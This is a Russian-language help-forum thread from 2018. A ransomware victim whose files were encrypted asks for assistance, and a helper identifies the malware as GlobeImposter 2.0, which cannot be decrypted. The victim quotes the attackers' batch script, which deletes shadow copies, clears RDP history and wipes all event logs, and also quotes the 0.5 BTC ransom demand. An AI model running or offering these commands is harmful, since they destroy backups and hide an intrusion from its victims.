Artem Parfenenko 0 Опубликовано 31 октября, 2018 Share Опубликовано 31 октября, 2018 Здравствуйте Зашифровали все рабочие данные.с добавлением к имени "{travolta_john@aol.com}"Во всех папках прилагался файл: how_to_back_files.html проверили с помошью Kaspersky Virus Removal Tool 2015; Dr.Web CureIt!. Выявлены следующие результаты:https://ibb.co/gkS4L0 https://ibb.co/dEmBYL bat файл содержил следующую информацию: @echo off vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" Логи в файле: CollectionLog-2018.10.31-12.07.zip Спасибо, очень ждем Вашей помощи. how_to_back_files.html CollectionLog-2018.10.31-12.07.zip Ссылка на сообщение Поделиться на другие сайты
Sandor 1 296 Опубликовано 31 октября, 2018 Share Опубликовано 31 октября, 2018 Здравствуйте! Автологер разве не предупредил вас, что запущен из терминальной сессии, а надо из консоли? По возможности, переделайте. + пару зашифрованных документов в архиве прикрепите к следующему сообщению. Ссылка на сообщение Поделиться на другие сайты
Artem Parfenenko 0 Опубликовано 31 октября, 2018 Автор Share Опубликовано 31 октября, 2018 К сожалению проделать выгрузку логов не из терминала, нет возможности.Файлы для примера в Архиве "Примеры.rar". Примеры.rar Ссылка на сообщение Поделиться на другие сайты
Sandor 1 296 Опубликовано 31 октября, 2018 Share Опубликовано 31 октября, 2018 К сожалению, это GlobeImposter 2.0 и расшифровки нет. Ссылка на сообщение Поделиться на другие сайты
Artem Parfenenko 0 Опубликовано 31 октября, 2018 Автор Share Опубликовано 31 октября, 2018 Переписка с злоумышленником: 1 ID = 0.5 BTC For decrypt need pay 0.5 BTC You can send me one file for test. File only picture or text. No database, no backup. Only we can decrypt your data. Ссылка на сообщение Поделиться на другие сайты
Sandor 1 296 Опубликовано 31 октября, 2018 Share Опубликовано 31 октября, 2018 На ваш страх и риск. Известны случаи, когда после получения оплаты злодеи исчезали и ничего не высылали. Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти